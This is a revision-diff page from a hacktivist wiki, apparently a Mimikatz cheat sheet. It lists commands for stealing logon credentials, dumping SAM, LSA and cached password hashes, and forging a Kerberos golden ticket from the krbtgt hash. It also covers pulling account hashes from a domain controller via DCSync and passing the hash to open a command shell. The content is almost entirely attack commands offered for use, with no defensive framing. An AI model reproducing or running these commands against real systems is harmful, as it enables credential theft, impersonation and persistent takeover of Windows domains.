Mimikatz: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
Line 10: Line 10:
* sekurlsa::ekeys
* sekurlsa::ekeys


=== Create a golden ticket on DC ===
=== Create a golden ticket on the domain controller ===
* privilege::debug
* privilege::debug
* lsadump::lsa /inject /name:krbtgt
* lsadump::lsa /inject /name:krbtgt

Revision as of 22:16, 24 June 2023

Steal creds

  • privilege::debug
  • sekurlsa::logonpasswords

Dump Hashes

  • token::elevate
  • lsadump::sam
  • lsadump::lsa /patch
  • lsadump::lsa /inject
  • lsadump::cache
  • sekurlsa::ekeys

Create a golden ticket on the domain controller

  • privilege::debug
  • lsadump::lsa /inject /name:krbtgt
  • kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
  • misc::cmd

Retrieve the password hashes of user accounts from a domain controller

  • lsadump::dcsync /user:<USER>

Pass the Hash

  • sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd
Retrieved from "https://enlacehacktivista.org/index.php?title=Mimikatz&oldid=1060"